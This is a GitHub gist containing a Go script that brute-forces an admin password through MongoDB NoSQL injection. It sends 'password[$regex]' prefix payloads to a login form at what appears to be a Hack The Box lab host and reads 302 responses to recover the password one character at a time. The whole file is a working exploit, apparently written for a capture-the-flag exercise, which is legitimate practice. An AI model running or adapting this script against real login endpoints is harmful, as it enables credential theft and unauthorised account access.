Created
November 26, 2019 20:00
-
-
Save daehee/bbd1ad835c81c288a2e9ed06046a296b to your computer and use it in GitHub Desktop.
Bruteforce MongoDB Credentials with Regex Match Payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"fmt" | |
"net/http" | |
"net/url" | |
"strings" | |
) | |
// Build a rune slice of printable ASCII characters, excluding some special characters that would break the regex | |
func buildPrintable() []rune { | |
var p []rune | |
for i := '0'; i <= '9'; i++ { | |
p = append(p, i) | |
} | |
for i := 'A'; i <= 'Z'; i++ { | |
p = append(p, i) | |
} | |
for i := 'a'; i <= 'z'; i++ { | |
p = append(p, i) | |
} | |
special := "~>][<>!@#%^()@_{}" | |
for _, c := range special { | |
p = append(p, c) | |
} | |
return p | |
} | |
// Post form data with URL-encoded payload | |
func makePostRequest(data string) int { | |
u := "http://staging-order.mango.htb" | |
req, err := http.NewRequest("POST", u, strings.NewReader(data)) | |
req.Header.Set("Content-Type", "application/x-www-form-urlencoded") | |
client := &http.Client{ | |
// Prevent redirects | |
CheckRedirect: func(req *http.Request, via []*http.Request) error { | |
return http.ErrUseLastResponse | |
}, | |
} | |
resp, err := client.Do(req) | |
if err != nil { | |
panic(err) | |
} | |
defer resp.Body.Close() | |
return resp.StatusCode | |
} | |
func buildPostData(victim, payload string) string { | |
data := url.Values{} | |
data.Set("username", victim) | |
data.Set("password[$regex]", payload+".*") | |
return data.Encode() | |
} | |
func main() { | |
printable := buildPrintable() | |
victim := "admin" | |
fmt.Printf("[*] Bruteforcing password for: %s\n", victim) | |
for _, a := range printable { | |
flag := string(a) | |
restart := true | |
for restart { | |
restart = false | |
for _, c := range printable { | |
payload := flag + string(c) | |
data := buildPostData(victim, payload) | |
statusCode := makePostRequest(data) | |
if statusCode == 302 { | |
fmt.Println(payload) | |
flag = payload | |
restart = true | |
} | |
} | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment